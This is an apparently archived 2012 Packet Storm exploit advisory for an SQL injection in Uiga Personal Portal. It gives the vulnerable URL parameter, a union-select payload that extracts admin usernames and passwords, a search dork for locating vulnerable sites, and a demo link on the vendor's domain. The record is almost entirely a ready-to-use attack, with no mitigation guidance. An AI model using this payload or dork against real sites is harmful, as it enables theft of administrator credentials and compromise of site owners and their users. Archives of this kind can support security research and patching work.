Uiga Personal Portal SQL Injection

2012-04-27T00:00:00
ID PACKETSTORM:112288
Type packetstorm
Reporter Farbod Mahini
Modified 2012-04-27T00:00:00

Description

                                        
                                            `########################################################################################  
# #  
# Exploit Title : Uiga Personal Portal Sql Injection Vulnerability #  
# #  
# Author : Secure-Land Security Team #  
# #  
# Discovered By : farbodmahini #  
# #  
# Home : Secure-Land.net #  
# #  
# Version : All Version #  
# #  
# Vendor : www.uiga.com #  
# #  
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #  
# #  
# Security Risk : High #  
# #  
# Dork : "Copyright uigapersonalportal.com" #  
# #  
########################################################################################  
# #  
# Expl0iT: #  
# #  
# #  
# http://[TarGeT]/[Patch]/index2.php?c=1&p=[SQL] #  
# #  
# +SQL : #  
# #  
# -1+union+select+1,group_concat(admin_name,0x3a,admin_password),3,4,5+from+admin #  
# #  
# #  
# Demo : #  
# #  
# http://www.uiga.com/product/demo/uigaportal/index2.php?c=29&p=[SQL*] #  
# #  
########################################################################################  
# #  
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #  
# #  
########################################################################################  
# #  
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #  
# #  
########################################################################################  
`